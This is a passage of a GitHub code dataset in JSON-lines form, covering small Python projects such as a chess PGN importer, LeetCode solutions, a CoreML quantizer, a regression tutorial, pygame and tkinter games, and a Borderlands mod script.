ref = game.headers[\"Site\"]\n mcache.append(\n (\n index,\n headeroff,\n game.headers[\"White\"],\n game.headers[\"Black\"],\n game.headers[\"WhiteElo\"],\n game.headers[\"BlackElo\"],\n game.headers[\"Result\"],\n game.headers[\"TimeControl\"],\n plies,\n game.headers[\"ECO\"],\n ref\n )\n )\n mcached += 1\n if ccount <= 0:\n db.executemany(\"INSERT INTO pgn VALUES (\" + insertmarks + \")\", mcache)\n dbconn.commit()\n ccount = commit\n mcache = []\n mcached = 0\n else:\n ccount -= 1\n now = time.time()\n if now - ts > 1:\n ts = now\n print(f\"Processed {index} games (cached {mcached}), {100.0*headeroff/filesize:.2f}%\")\n index += 1\n\n# Final flush of cached items\ndb.executemany(\"INSERT INTO pgn VALUES (\" + insertmarks + \")\", mcache)\ndbconn.commit()\n","repo_name":"kdave/pgn-toys","sub_path":"pgn2sqlite.py","file_name":"pgn2sqlite.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22520789711","text":"import xmltodict\n\ndef processXML(filename):\n with open('magazijn.xml') as myXMLFile:\n filestring = myXMLFile.read()\n xmldictionary = xmltodict.parse(filestring)\n return xmldictionary\n\nartikelendict = processXML('magazijn.xml')\nartikelen = artikelendict['artikelen']['artikel']\n\nprint(artikelendict)\n\nfor artikel in artikelen:\n print(artikel['naam'])\n","repo_name":"johnvanmeerten/TiCT-VIPROG-15","sub_path":"Les10/Practice Exercise 10_1.py","file_name":"Practice Exercise 10_1.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22701170350","text":"#-*- coding: utf-8 -*-\nimport os\n\nroot_dir='C:\\\\Users\\\\Administrator.AHN-01806070854\\\\Desktop\\\\thesis\\\\real_results'\ndir_list=os.listdir(root_dir)\ndic={}\ndic['HwpSummaryInformation']=1\ndic['BIN0001']=1\ndic['BIN0002']=1\ndic['BIN0003']=1\ndic['BIN0004']=1\ndic['BIN0005']=1\ndic['Section0']=1\ndic['DocInfo']=1\ndic['_LinkDoc']=1\ndic['FileHeader']=1\ndic['PrvImage']=1\ndic['PrvText']=1\ndic['DefaultJScript']=1\ndic['JScriptVersion']=1\n\ni=1\nfor j in range(len(dir_list)):\n\tfile=root_dir+\"\\\\test3_\"+str(i)+'\\\\test3_'+str(i)+'_field_info.txt'\n\tf=open(file)\n\tdata=f.read()\n\ttmp=data.split('\\n')\n\t\n\ti+=1\n\n\tfor t in tmp:\n\t\tif 'HwpSummaryInformation' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['HwpSummaryInformation']+=int(temp[1])\n\n\t\tif 'BIN0001' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['BIN0001']+=int(temp[1])\n\n\t\tif 'BIN0002' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['BIN0002']+=int(temp[1])\n\n\t\tif 'BIN0003' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['BIN0003']+=int(temp[1])\n\n\t\tif 'BIN0004' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['BIN0004']+=int(temp[1])\n\n\t\tif 'BIN0004' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['BIN0004']+=int(temp[1])\n\n\t\tif 'BIN0005' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['BIN0005']+=int(temp[1])\n\n\t\tif 'Section0' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['Section0']+=int(temp[1])\n\n\t\tif 'DocInfo' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['DocInfo']+=int(temp[1])\n\n\t\tif '_LinkDoc' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['_LinkDoc']+=int(temp[1])\n\n\t\tif 'FileHeader' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['FileHeader']+=int(temp[1])\n\t\n\t\tif 'PrvImage' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['PrvImage']+=int(temp[1])\n\t\t\t\n\t\tif 'PrvText' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['PrvText']+=int(temp[1])\n\n\t\tif 'DefaultJScript' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['DefaultJScript']+=int(temp[1])\n\t\n\t\tif 'JScriptVersion' in t:\n\t\t\ttemp=t.split(' ')\n\t\t\t\n\t\t\tdic['JScriptVersion']+=int(temp[1])\n\n\tf.close()\n\tfile=root_dir+'total_count.txt'\n\tf=open(file,'w')\n\tstring_tmp=''\n\tfor key in dic:\n\t\tstring=key+' '+str(dic[key])+'\\n'\n\t\tstring_tmp+=string\n\tf.write(string_tmp)\n\tf.close()","repo_name":"leeforest/VAEFuzzer","sub_path":"total_count.py","file_name":"total_count.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17035470701","text":"#!/usr/bin/env python\n# author = 'ZZH'\n# time = 2022/6/25\n# project = leetcode剑指offer091-粉刷房子\nfrom typing import List\n\n\nclass Solution:\n def minCost(self, costs: List[List[int]]) -> int:\n for i in range(1, len(costs)):\n costs[i][0] += min(costs[i - 1][1], costs[i - 1][2])\n costs[i][1] += min(costs[i - 1][0], costs[i - 1][2])\n costs[i][2] += min(costs[i - 1][0], costs[i - 1][1])\n return min(costs[-1])\n\n\nsolution = Solution()\nprint(solution.minCost([[17, 2, 17], [16, 16, 5], [14, 3, 19]]))\n","repo_name":"ZZHbible/leetcode","sub_path":"leetcode剑指offer091-粉刷房子.py","file_name":"leetcode剑指offer091-粉刷房子.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38901356351","text":"# -*- coding: utf-8 -*-\n# ======================================\n# @File : 524.py\n# @Time : 2020/5/9 17:48\n# @Author : Rivarrl\n# ======================================\nfrom algorithm_utils import *\n\nclass Solution:\n \"\"\"\n [524. 通过删除字母匹配到字典里最长单词](https://leetcode-cn.com/problems/longest-word-in-dictionary-through-deleting/)\n \"\"\"\n @timeit\n def findLongestWord(self, s: str, d: List[str]) -> str:\n from collections import Counter\n ds = Counter(s)\n n = len(s)\n d.sort(key=lambda x: (-len(x), x))\n for word in d:\n dw = Counter(word)\n flag = True\n for k, v in dw.items():\n if not k in ds or ds[k] < v:\n flag = False\n break\n if not flag: continue\n i = j = 0\n m = len(word)\n while i < n and j < m:\n if s[i] == word[j]:\n j += 1\n i += 1\n if j == m: return word\n return \"\"\n\n\nif __name__ == '__main__':\n a = Solution()\n a.findLongestWord(s = \"abpcplea\", d = [\"ale\",\"apple\",\"monkey\",\"plea\"])\n a.findLongestWord(s = \"abpcplea\", d = [\"a\",\"b\",\"c\"])","repo_name":"Rivarrl/leetcode_python","sub_path":"leetcode/301-600/524.py","file_name":"524.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"5592256427","text":"\"\"\"\ndecorator extension for 'nose'.\n\nAllows you to decorate functions, classes, and methods with attributes\nwithout modifying the actual source code. Particularly useful in\nconjunction with the 'attrib' extension package.\n\"\"\"\n\nimport sys\nerr = sys.stderr\n\nimport logging\nimport os\nfrom nose.plugins.base import Plugin\n\nlog = logging.getLogger(__name__)\n\ndef sort_plugins_by_priority(a, b):\n pa = getattr(a, 'call_priority', 100)\n pb = getattr(b, 'call_priority', 100)\n\n return cmp(pa, pb)\n\nclass Decorator(Plugin):\n call_priority=-100 # put this plugin at a high priority.\n \n def __init__(self):\n Plugin.__init__(self)\n \n def add_options(self, parser, env=os.environ):\n parser.add_option(\"--decorator-file\",\n action=\"store\",\n dest=\"decorator_file\",\n default=None,\n help=\"Apply attributes in this file to matching functions, classes, and methods\")\n\n def configure(self, options, config):\n self.conf = config\n\n ### configure logging\n \n logger = logging.getLogger(__name__)\n logger.propagate = 0\n\n handler = logging.StreamHandler(err)\n logger.addHandler(handler)\n \n lvl = logging.WARNING\n if options.verbosity >= 5:\n lvl = 0\n elif options.verbosity >= 4:\n lvl = logging.DEBUG\n elif options.verbosity >= 3:\n lvl = logging.INFO\n logger.setLevel(lvl)\n\n ### enable plugin & save decorator file name, if given.\n \n if options.decorator_file:\n self.enabled = True\n self.decorator_file = options.decorator_file\n\n def begin(self):\n \"\"\"\n Called before any tests are run.\n\n The only trick here is that we have to mangle the order of\n the plugins, because this plugin *must* be called before\n any plugins that examine the attributes being set. This is\n done by sorting the plugins in-place.\n \"\"\"\n\n ### sort plugins by specified call_priority. HACK!\n self.conf.plugins.sort(sort_plugins_by_priority)\n\n ### load in the specified attributes file.\n \n filename = self.decorator_file\n \n fp = open(filename)\n\n curtains = {}\n for line in fp:\n\n # skip empty lines or lines with comments ('#')\n line = line.strip()\n if not line or line.startswith('#'):\n continue\n\n # parse attributes...\n name, attrib = line.split(':')\n name = name.strip()\n attrib = attrib.strip()\n\n # ...and store 'em.\n l = curtains.get(name, [])\n l.append(attrib)\n curtains[name] = l\n\n # save the attributes in 'self.curtains'.\n self.curtains = curtains\n\n ######\n \n def wantClass(self, cls):\n \"\"\"\n wantClass -- attach matching attributes to the class.\n \"\"\"\n fullname = '%s.%s' % (cls.__module__, cls.__name__,)\n self._attach_attributes(fullname, cls)\n\n # indicate no preferences re running this test...\n return None\n\n def wantMethod(self, method):\n \"\"\"\n wantMethod -- attach matching attributes to this method.\n \"\"\"\n fullname = '%s.%s.%s' % (method.__module__,\n method.im_class.__name__,\n method.__name__)\n\n self._attach_attributes(fullname, method)\n\n # indicate no preference re running this test...\n return None\n\n def wantFunction(self, func):\n \"\"\"\n wantFunction -- attach matching attributes to this function.\n \"\"\"\n fullname = '%s.%s' % (func.__module__,\n func.__name__)\n \n self._attach_attributes(fullname, func)\n\n # indicate no preferences re running this test.\n return None\n\n def _attach_attributes(self, fullname, obj):\n \"\"\"\n Attach attributes matching 'fullname' to the object 'obj'.\n \"\"\"\n attribs = self.curtains.get(fullname, [])\n log.info('_attach_attributes: %s, %s' % (fullname, attribs,))\n \n for a in attribs:\n obj.__dict__[a] = True\n","repo_name":"OldhamMade/pinocchio","sub_path":"pinocchio/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"45492362064","text":"import math\n\ndef solution(n, words):\n \n check = []\n check.append(words[0])\n num = -1\n \n for i in range(1, len(words)):\n if words[i] in check:\n num = i+1\n break\n check.append(words[i])\n temp1 = list(words[i-1])\n temp2 = list(words[i])\n if temp1[-1] != temp2[0]:\n num = i+1\n break\n \n if num == -1:\n return [0,0]\n else:\n if num%n == 0:\n return [n, math.ceil(num/n)]\n return [num%n, math.ceil(num/n)]\n \n \n","repo_name":"SL313/algorithm","sub_path":"Programmers/Level2/영어 끝말잇기.py","file_name":"영어 끝말잇기.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39776843751","text":"import sys\nimport coremltools\nfrom coremltools.models.neural_network.quantization_utils import *\nimport os\ndef quantize(fin, bits, functions, fout):\n model = coremltools.models.MLModel(fin)\n for function in functions :\n for bit in bits:\n sys.stdout.flush()\n quantized_model = quantize_weights(model, bit, function)\n sys.stdout.flush()\n #quantized_model.author = \"Alexis Creuzot\"\n #quantized_model.short_description = str(bit)+\"-bit per quantized weight, using \"+function+\".\"\n #quantized_model.save(fout)\n coremltools.utils.save_spec(quantized_model, fout)\n\ndef qtz(fin, fout):\n model_spec = coremltools.utils.load_spec(fin)\n model_fp16_spec = coremltools.utils.convert_neural_network_spec_weights_to_fp16(model_spec)\n coremltools.utils.save_spec(model_fp16_spec, fout)\n\n\nflist = os.listdir('.')\nfor f in flist:\n if f.endswith('mlmodel'):\n fin = f\n fout = 'qtz/%s' % f\n quantize(fin, [8], ['linear'], fout)\n #qtz(fin, fout)\n","repo_name":"biaoxiaoduan/nerual-style","sub_path":"quantize.py","file_name":"quantize.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15999487270","text":"# Multiple Linear Regression\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('50_Startups.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 4].values\n\n# Encoding categorical data\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder = LabelEncoder()\nX[:, 3] = labelencoder.fit_transform(X[:, 3])\nonehotencoder = OneHotEncoder(categorical_features = [3])\nX = onehotencoder.fit_transform(X).toarray()\n\n# Avoiding the Dummy Variable Trap\nX = X[:, 1:]\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\n\n# Feature Scaling\n\"\"\"from sklearn.preprocessing import StandardScaler\nsc_X = StandardScaler()\nX_train = sc_X.fit_transform(X_train)\nX_test = sc_X.transform(X_test)\nsc_y = StandardScaler()\ny_train = sc_y.fit_transform(y_train)\"\"\"\n\n# Fitting Multiple Linear Regression to the Training set\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n# Predicting the Test set results\ny_pred = regressor.predict(X_test)\n\n# Building the \"optimal model\" using Backward Elimination\nimport statsmodels.formula.api as sm\n\n# this is the intercept [B0 column] that we need when using sm.OLS\n# axis = 1 , add a column\nX = np.append(arr = np.ones((50, 1)).astype(int), values = X, axis = 1)\n\n# backward elimination : Select a significance level to stay in the model ( ex: SL = 0.05)\n# Step 1 : Fit the full model with all possible predictors\n# Step 2 : Consider the predictor with the highest p-value. If P > SL, Remove the predictor\n# repeat the process\n\n# matrix containing all the independent variables\n# Fit the full model with all possible predictors\nX_opt = X[:, [0, 1, 2, 3, 4, 5]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit() # OLS - Ordinary Least Squares\nregressor_OLS.summary()\n\nX_opt = X[:, [0, 1, 3, 4, 5]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\nX_opt = X[:, [0, 3, 4, 5]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\nX_opt = X[:, [0, 3, 5]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\nX_opt = X[:, [0, 3]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()","repo_name":"rdayala/AI-ML-Learning","sub_path":"MachineLearning/Part 2 - Regression/Section 5 - Multiple Linear Regression/Homework_Solutions/multiple_linear_regression.py","file_name":"multiple_linear_regression.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"29362167054","text":"import pygame\nfrom game_config import CONFIG\nfrom player_controller import PlayerController\nfrom map import Map\nfrom component import *\ndirection = [\"left\", \"right\", \"up\", \"down\"]\n\n\nclass Game:\n def __init__(self):\n self.screen = pygame.display.set_mode((CONFIG.WIDTH, CONFIG.HEIGHT))\n self.key_down = {}\n self.renderer = []\n self.preload()\n set_world_bound(left = 0, right = 300, top = 22, bottom= 364)\n\n def preload(self):\n for key in direction:\n self.key_down[key] = False\n\n img_path = CONFIG.img_path\n self.map = Map()\n self.player = PlayerController()\n\n def handle_rotate(self, rotate):\n rot = {\n \"left\" : [-CONFIG.speed, 0],\n \"right\" : [CONFIG.speed, 0],\n \"up\" : [0, -CONFIG.speed],\n \"down\" : [0, CONFIG.speed]\n }\n\n self.player.rotate = rotate\n self.player.speedX = rot[rotate][0]\n self.player.speedY = rot[rotate][1]\n self.key_down[rotate] = True\n self.player.moving = True\n\n def handle_event(self, event):\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n self.handle_rotate(\"left\")\n if event.key == pygame.K_RIGHT:\n self.handle_rotate(\"right\")\n if event.key == pygame.K_UP:\n self.handle_rotate(\"up\")\n if event.key == pygame.K_DOWN:\n self.handle_rotate(\"down\")\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT:\n self.key_down[\"left\"] = False\n if event.key == pygame.K_RIGHT:\n self.key_down[\"right\"] = False\n if event.key == pygame.K_UP:\n self.key_down[\"up\"] = False\n if event.key == pygame.K_DOWN:\n self.key_down[\"down\"] = False\n\n\n def update(self):\n self.player.update(self.key_down)\n","repo_name":"treesseven/dig-dug-arrangement","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15454116543","text":"from microbit import *\nimport neopixel\nimport tm1637\ntm=tm1637.TM1637(clk=pin15,dio=pin16)\nnp = neopixel.NeoPixel(pin14, 16)\nwhile True:\n x=pin1.read_analog()\n y=int(x/4)\n tm.show('{:04d}'.format(pin1.read_analog()))\n if(x>512):\n for i in range(0,12):\n np[i] = (0,y,0)\n np.show()\n else:\n for i in range(0,12):\n np[i] = (0,0,y)\n np.show()\n\n","repo_name":"piramid/microbit","sub_path":"neopixelVRcontrol.py","file_name":"neopixelVRcontrol.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39767278169","text":"import tkinter\nfrom tkinter import *\nfrom tkinter import ttk\n#importando pillow\nfrom PIL import Image, ImageTk\nimport random\n\n#cores\nco0 = \"#FFFFFF\" # white / branca\nco1 = \"#333333\" # black / preta\nco2 = \"#fcc058\" # orange / laranja\nco3 = \"#fff873\" # yellow / amarela\nco4 = \"#34eb3d\" # green / verde\nco5 = \"#e85151\" # red / vermelha\nfundo = \"#3b3b3b\"\n\n#configurando a janela\njanela = tkinter.Tk()\njanela.title('')\njanela.geometry('260x280')\njanela.configure(bg=fundo)\n\n#dividindo a janela\nframe_cima = Frame(janela, width=260, height=100, bg=co1, relief='raised')\nframe_cima.grid(row=0, column=0, sticky=NW)\n\nframe_baixo = Frame(janela, width=260, height=300, bg=co0, relief='flat')\nframe_baixo.grid(row=1, column=0, sticky=NW)\n\nestilo = ttk.Style(janela)\nestilo.theme_use('clam')\n\n#configurando o frame cima\n\n# Jogador\napp_1 = Label(frame_cima,\n text=\"Você\",\n height=1,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co1,\n fg=co0)\napp_1.place(x=25, y=70)\n\n#linha que ai ficar colorida do seu lado quando ganhar\napp_1_linha = Label(frame_cima,\n text=\"\",\n height=10,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co0,\n fg=co0)\napp_1_linha.place(x=0, y=0)\n\napp_1_pontos = Label(frame_cima,\n text=\"0\",\n height=1,\n anchor='center',\n font=('Ivy 30 bold'),\n bg=co1,\n fg=co0)\napp_1_pontos.place(x=50, y=20)\n\napp_ = Label(frame_cima,\n text=\":\",\n height=1,\n anchor='center',\n font=('Ivy 30 bold'),\n bg=co1,\n fg=co0)\napp_.place(x=125, y=20)\n\n# PC\napp_2_pontos = Label(frame_cima,\n text=\"0\",\n height=1,\n anchor='center',\n font=('Ivy 30 bold'),\n bg=co1,\n fg=co0)\napp_2_pontos.place(x=170, y=20)\n\napp_2 = Label(frame_cima,\n text=\"PC\",\n height=10,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co1,\n fg=co0)\napp_2.place(x=205, y=70)\n\n#linha que vai ficar colorida quando ganha lado adversário\napp_2_linha = Label(frame_cima,\n text=\"\",\n height=10,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co0,\n fg=co0)\napp_2_linha.place(x=255, y=0)\n\n# linha que ira sinalizar empate\napp_linha = Label(frame_cima,\n text=\"\",\n width=255,\n anchor='center',\n font=('Ivy 1 bold'),\n bg=co0,\n fg=co0)\napp_linha.place(x=0, y=95)\n\napp_pc = Label(frame_baixo,\n text=\"\",\n height=1,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co0,\n fg=co0)\napp_pc.place(x=190, y=10)\n\napp_vc = Label(frame_baixo,\n text=\"\",\n height=1,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co0,\n fg=co0)\napp_vc.place(x=20, y=10)\n\n# variavel global\n\nglobal voce\nglobal pc\nglobal rondas #quantidade de vez que iremos jogar\nglobal pontos_voce\nglobal pontos_pc\n\npontos_voce = 0\npontos_pc = 0\nrondas = 0\n\n# função logica do jogo\n\n\ndef jogar(i):\n global rondas\n global pontos_voce\n global pontos_pc\n # verse o numeros de rondas for exedida\n if rondas <= 5:\n print(rondas)\n opcoes = ['Pedra', 'Papel', 'Tesoura']\n pc = random.choice(opcoes)\n voce = i\n\n app_pc['text'] = pc\n app_pc['fg'] = co1\n\n app_vc['text'] = voce\n app_vc['fg'] = co1\n\n # caso as escolhas sejam iguais\n if voce == 'Pedra' and pc == 'Pedra':\n print('empate')\n app_linha['bg'] = co3\n app_1_linha['bg'] = co0\n app_2_linha['bg'] = co0\n\n elif voce == 'Papel' and pc == 'Papel':\n print('empate')\n app_linha['bg'] = co3\n app_1_linha['bg'] = co0\n app_2_linha['bg'] = co0\n\n elif voce == 'Tesoura' and pc == 'Tesoura':\n print('empate')\n app_linha['bg'] = co3\n app_1_linha['bg'] = co0\n app_2_linha['bg'] = co0\n\n # condiçoes diferentes\n #eu pedra\n elif voce == 'Pedra' and pc == 'Papel':\n print('Pc ganhou')\n app_linha['bg'] = co0\n app_1_linha['bg'] = co0\n app_2_linha['bg'] = co5\n\n pontos_pc += 10\n\n elif voce == 'Pedra' and pc == 'Tesoura':\n print('Voce ganhou')\n app_linha['bg'] = co0\n app_1_linha['bg'] = co4\n app_2_linha['bg'] = co0\n\n pontos_voce += 10\n\n # eu Papel\n elif voce == 'Papel' and pc == 'Tesoura':\n print('Pc ganhou')\n app_linha['bg'] = co0\n app_1_linha['bg'] = co0\n app_2_linha['bg'] = co5\n\n pontos_pc += 10\n\n elif voce == 'Papel' and pc == 'Pedra':\n print('Voce ganhou')\n app_linha['bg'] = co0\n app_1_linha['bg'] = co4\n app_2_linha['bg'] = co0\n\n pontos_voce += 10\n\n # eu tesoura\n elif voce == 'Tesoura' and pc == 'Pedra':\n print('Pc ganhou')\n app_linha['bg'] = co0\n app_1_linha['bg'] = co0\n app_2_linha['bg'] = co5\n\n pontos_pc += 10\n\n elif voce == 'Tesoura' and pc == 'Papel':\n print('Voce ganhou')\n app_linha['bg'] = co0\n app_1_linha['bg'] = co4\n app_2_linha['bg'] = co0\n\n pontos_voce += 10\n\n # atualizando a pontuação\n app_1_pontos['text'] = pontos_voce\n app_2_pontos['text'] = pontos_pc\n\n # atualizando numero de rondas / jogadas\n rondas += 1\n\n else:\n app_1_pontos['text'] = pontos_voce\n app_2_pontos['text'] = pontos_pc\n\n #chamando a função terminar\n fim_do_jogo()\n\n\n# função de iniciar jogo\ndef iniciar_jogo():\n global icon_1\n global icon_2\n global icon_3\n global b_icon_1\n global b_icon_2\n global b_icon_3\n\n b_jogar.destroy()\n\n # configurando frame baixo\n icon_1 = Image.open('images/pedra.png') #abrir imagem\n icon_1 = icon_1.resize((50, 50),\n Image.ANTIALIAS) #padronixa o tamanho da imagen\n icon_1 = ImageTk.PhotoImage(icon_1)\n b_icon_1 = Button(frame_baixo,\n command=lambda: jogar('Pedra'),\n width=50,\n image=icon_1,\n compound=CENTER,\n bg=co0,\n fg=co0,\n font=('Ivy 10 bold'),\n anchor=CENTER,\n relief=FLAT)\n b_icon_1.place(x=15, y=60)\n\n icon_2 = Image.open('images/papel.png')\n icon_2 = icon_2.resize((50, 50), Image.ANTIALIAS)\n icon_2 = ImageTk.PhotoImage(icon_2)\n b_icon_2 = Button(frame_baixo,\n command=lambda: jogar('Papel'),\n width=50,\n image=icon_2,\n compound=CENTER,\n bg=co0,\n fg=co0,\n font=('Ivy 10 bold'),\n anchor=CENTER,\n relief=FLAT)\n b_icon_2.place(x=95, y=60)\n\n icon_3 = Image.open('images/tesoura.png')\n icon_3 = icon_3.resize((50, 50), Image.ANTIALIAS)\n icon_3 = ImageTk.PhotoImage(icon_3)\n b_icon_3 = Button(frame_baixo,\n command=lambda: jogar('Tesoura'),\n width=50,\n image=icon_3,\n compound=CENTER,\n bg=co0,\n fg=co0,\n font=('Ivy 10 bold'),\n anchor=CENTER,\n relief=FLAT)\n b_icon_3.place(x=170, y=60)\n\n\n# função terninar jogo\ndef fim_do_jogo():\n global rondas\n global pontos_voce\n global pontos_pc\n\n # reinicando as variaveis para zerar jogo\n pontos_voce = 0\n pontos_pc = 0\n rondas = 0\n\n # destruindo os botoes de opções\n b_icon_1.destroy()\n b_icon_2.destroy()\n b_icon_3.destroy()\n\n # definindo o vencedor\n jogador_voce = int(app_1_pontos['text'])\n jogador_pc = int(app_2_pontos['text'])\n\n if jogador_voce > jogador_pc:\n app_vencedor = Label(frame_baixo,\n text=\"Parabens voce ganhou !!!\",\n height=1,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co0,\n fg=co4)\n app_vencedor.place(x=5, y=60)\n elif jogador_voce < jogador_pc:\n app_vencedor = Label(frame_baixo,\n text=\"Infelizmente voce perdeu !!!\",\n height=1,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co0,\n fg=co5)\n app_vencedor.place(x=5, y=60)\n else:\n app_vencedor = Label(frame_baixo,\n text=\"Foi um empate !!!\",\n height=1,\n anchor='center',\n font=('Ivy 10 bold'),\n bg=co0,\n fg=co1)\n app_vencedor.place(x=5, y=60)\n\n # jogar denovo\n def jogar_denovo():\n app_1_pontos['text'] = 0\n app_2_pontos['text'] = 0\n app_vencedor.destroy()\n\n b_jogar_denovo.destroy()\n\n iniciar_jogo()\n\n b_jogar_denovo = Button(frame_baixo,\n command=jogar_denovo,\n width=30,\n text='Jogar denovo',\n bg=fundo,\n fg=co0,\n font=('Ivy 10 bold'),\n anchor=CENTER,\n relief=RAISED,\n overrelief=RIDGE)\n b_jogar_denovo.place(x=5, y=151)\n\n\nb_jogar = Button(frame_baixo,\n command=iniciar_jogo,\n width=30,\n text='JOGAR',\n bg=fundo,\n fg=co0,\n font=('Ivy 10 bold'),\n anchor=CENTER,\n relief=RAISED,\n overrelief=RIDGE)\nb_jogar.place(x=5, y=151)\n\njanela.mainloop()\n\n#instalar o python Pillow\n","repo_name":"YaraBertazzi/jokenpo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10797,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36042155280","text":"import sys\nsys.path.append('../../python_mod_helpers')\nfrom wlhotfixmod.wlhotfixmod import Mod\n\n# Shenanigans indeed! I basically never play these games co-op, and arranging to\n# do so just to pop a couple of Steam achievements always seems like less fun than\n# haxing the framework to do it for me. So this hooks up the two co-op achievements\n# to trigger based on weapon kills (the values gleaned from whatever savegame I\n# was using at the time) instead of their usual stats.\n\nmod = Mod('achievement_shenanigans.txt',\n \"Achievement Shenanigans\",\n 'Apocalyptech',\n [\n ],\n lic=Mod.CC_BY_SA_40,\n )\n\n# Stat to inject\ntracked_stat = Mod.get_full_cond('/Game/PlayerCharacters/_Shared/_Design/Stats/Combat/Weapon/Stat_Weapon_AssaultRifleKills', 'GameStatData')\ntracked_stat_target = 1199\n\n# These actually function a bit differently -- the trading one redirects through a BP_Challenge_Console_Trade\n# to get to the object we alter here, and as a result, we need the targets to look a bit different. The\n# trading one tracks the stat completely independently, so we want that one to pop on 1. The revive one is\n# happy to use the \"real\" stat as-is, so we use that (ie: my current number of AR kills plus one).\nfor challenge, target in [\n # Trade with a player\n ('/Game/GameData/Challenges/Economy/Challenge_Economy_COOPTrade.Default__Challenge_Economy_COOPTrade_C', 1),\n # Revive a partner\n ('/Game/GameData/Challenges/System/BP_Challenge_Console_RevivePartner.Default__BP_Challenge_Console_RevivePartner_C', tracked_stat_target),\n ]:\n mod.reg_hotfix(Mod.PATCH, '',\n challenge,\n 'StatChallengeTests.StatChallengeTests[0]',\n f\"\"\"(\n StatId={tracked_stat},\n GoalInfo=(\n (\n GoalValue={target},\n NotificationThreshold={target}\n )\n )\n )\"\"\")\n\nmod.close()\n","repo_name":"BLCM/wlmods","sub_path":"Apocalyptech/deprecated_or_broken/gen_achievement_shenanigans.py","file_name":"gen_achievement_shenanigans.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"78"} +{"seq_id":"70412929531","text":"from gensim.models.doc2vec import Doc2Vec, TaggedDocument\r\n\r\n\r\nfile = [[\"I have a pet\"], [\"They have a pet\"], [\"she has no pet\"], [\"no pet\"], [\"many have pet\"], [\"Some have no pet\"], [\"they no pet\"], [\"no pet\"], [\"We have no pet\"]]\r\n\r\ntotal = [word.split() for sentence in file for word in sentence]\r\n\r\n#Tokenize the sentence so that I can feed it into Doc2Vec model for training\r\ntotalTagged = [TaggedDocument(sentence,[i]) for i, sentence in enumerate(total)]\r\n\r\n#Create the model, build the vocabulary and finally train it\r\nmodel = 